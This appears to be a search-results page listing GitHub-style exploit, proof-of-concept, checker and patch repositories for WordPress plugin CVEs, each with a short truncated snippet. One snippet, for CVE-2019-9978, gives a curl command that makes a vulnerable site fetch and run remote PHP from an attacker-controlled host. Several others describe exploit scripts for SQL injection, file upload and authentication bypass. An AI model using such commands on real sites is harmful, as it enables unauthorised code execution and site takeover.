320238 matches found
CVE-2025-32583
🚨 CVE-2025-32583 — WordPress PDF 2 Post RCE Exploit CRITICAL Vulnerability CVE-ID: CVE-2025-32583 Severity: 9.9 CRITICAL CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H 📖 Description A vulnerability in the PDF 2 Post WordPress plugin developed by termel allows Remote Code Inclusion RCE...
CVE-2019-9978
CVE-2019-9978 - Social Warfare Wordpress plugin RCE RCE on a Social Warfare Wordpress plugin without any prior authentication Proof Of Concept curl http://127.0.0.1/wp-admin/admin-post.php?rce=id&swpdebug=loadoptions&swpurl=http://172.18.0.1:1337/exploit.php Vulnerable code : Fix:...
CVE-2021-24750
How to use Start mysql, wordpress and wordpress-cli using docker-compose docker-compose -f docker-compose.yaml up -d Install wordpress, activate the plugin and create a user with the role subscriber using wordpress-cli docker-compose run --rm wp-cli install-wp Start the exploit script with an sql...
CVE-2022-0439
CVE-2022-0439 CVE-2022-0439 - Email Subscribers & Newsletters 5.3.2 - Subscriber+ Blind SQL injection Must Have sqlmap installed & a valid username & password with subscriber+ Usage usage: CVE-2022-0439.py -h -w URL -u USERNAME -p PASSWORD options: -h, --help show this help message and exit -w UR...
CVE-2026-5465
CVE-2026-5465: Privilege Escalation in Amelia WordPress Plugin ⚠️ Executive Summary Critical Insecure Direct Object Reference IDOR vulnerability in the Amelia plugin that allows an authenticated user with the Employee Provider role to escalate privileges up to full Account Takeover of the WordPres...
CVE-2024-24926
CVE-2024-24926 CVE-2024-24926 Vulnerability affects the Brooklyn theme for WordPress Description: The CVE-2024-24926 vulnerability affects the Brooklyn theme for WordPress versions up to 4.9.7.6 and is related to deserialization of untrusted data CWE-502. This allows an attacker to send malicious...
CVE-2024-10924-Wordpress-Docker
CVE-2024-10924 : Wordpress Really Simple Security authentication bypass flaw in Docker Description The Really Simple Security plugins Free, Pro, and Pro Multisite for WordPress, versions 9.0.0 to 9.1.1.1, are affected by an authentication bypass vulnerability. This issue arises from improper erro...
CVE-2024-8522
CVE-2024-8522 LearnPress – WordPress LMS Plugin execute class-lp-course-db.php:564, LPCourseDB-getcourses Courses.php:241, LearnPress\Models\Courses::getcourses class-lp-rest-courses-v1-controller.php:502, LPJwtCoursesV1Controller-getcourses class-wp-rest-server.php:1230,...
39646
39646 WordPress Plugin Advanced Video 1.0 - Local File Inclusion Update Original credit goes to evait security GmbH This script is a more robust version of the original exploit...
cve-2023-1874
CVE-2023-1874 Disclaimer THIS SCRIPT IS DESIGNED FOR WHITE HAT AND EDUCATIONAL PURPOSES ONLY. ANY USE OF THIS AGAINST A DEVICE YOU ARE NOT AUTHORIZED TO TEST ON OR DO NOT OWN IS YOUR OWN RESPONSIBILITY. THE AUTHOR OF THIS SCRIPT TAKES NO RESPONSIBILITY FOR ANYTHING YOU DO WITH THIS SCRIPT. YOUR...
CVE-2024-8353
This post is a research article published by EQSTLab. Thanks tocuokon, who discovered this vulnerability. Introduction Further Analysis CVE-2024-5932 EQST Insight R&TPDF file. https://github.com/user-attachments/assets/085c2f81-2894-4bb7-a3f5-62406dcb1021 CVE-2024-8353 ★ CVE-2024-8353 Arbitrary...
CVE-2023-51409
CVE-2023-51409 AI Engine: ChatGPT Chatbot = 1.9.98 - Unauthenticated Arbitrary File Upload via restupload Description: The AI Engine: Chatbots, Generators, Assistants, GPT 4 and more! plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the...
CVE-2026-9830
-orange?style=for-the-badge CVE-2026-9830 — BookingPress Pro Authentication Bypass Comprehensive Cybersecurity Threat Intelligence Investigation Overview • Reports • Key Findings • Technical Details • Risk Assessment • Mitigation • References 📋 Overview CVE-2026-9830 is a critical authentication...
CVE-2024-2387
CVE-2024-2387 Advanced Form Integration – Connect WooCommerce and Contact Form 7 to Google Sheets and other platforms = 1.82.0 - SQL Injection to Reflected Cross-Site Scripting via integrationid Description The Advanced Form Integration – Connect WooCommerce and Contact Form 7 to Google Sheets an...
CVE-2022-21661
CVE-2022-21661 POC Video | WordPress Core 5.8.2 - 'WPQuery' SQL Injection CVE-2022-21661 : EDB : https://www.exploit-db.com/exploits/50663...
CVE-2024-13800
CVE-2024-13800 Popup Plugin For WordPress - ConvertPlus = 3.5.30 - Missing Authorization to Authenticated Subscriber+ Limited Options Update Description The ConvertPlus plugin for WordPress is vulnerable to unauthorized modification of data that can lead to a denial of service due to a missing...
wp-user-registration-vuln-checker
WordPress User Registration Checker for CVE-2026-1492 Read-only checker for owned WordPress sites that may be affected by CVE-2026-1492 in the User Registration & Membership plugin. It helps a site owner confirm plugin exposure and look for compromise indicators such as hidden administrator...
cve-2018-6389-php-patcher
cve-2018-6389-php-patcher Patch Wordpress DOS breach CVE-2018-6389 in PHP. 1. Place patcher.php in WordPress root directory 2. Request yourwordpress.com/patcher.php 3. Delete patcher.php Source : https://www.securemydata.fr/patch-de-la-faille-cve-2018-6389-dos-wordpress/...
POC-CVE-2026-1357
CVE-2026-1357 WPvivid Backup & Migration RCE PoC Discovered by: Lucas Montes NiRoX Vulnerability: Unauthenticated Arbitrary File Upload leading to Remote Code Execution RCE CVE ID: CVE-2026-1357 CVSS: Critical9.8 Status: Patched in version 0.9.124 Overview This repository contains the analysis an...
CVE-2022-1329
WP Elementor 3.6.0/1/2 Remote Code Execution Google Dork: none Date: April 16 2022 Exploit Author: AkuCyberSec https://github.com/AkuCyberSec Vendor Homepage: https://elementor.com/ Software Link: https://wordpress.org/plugins/elementor/advanced/ scroll down to select the version Version: 3.6.0,...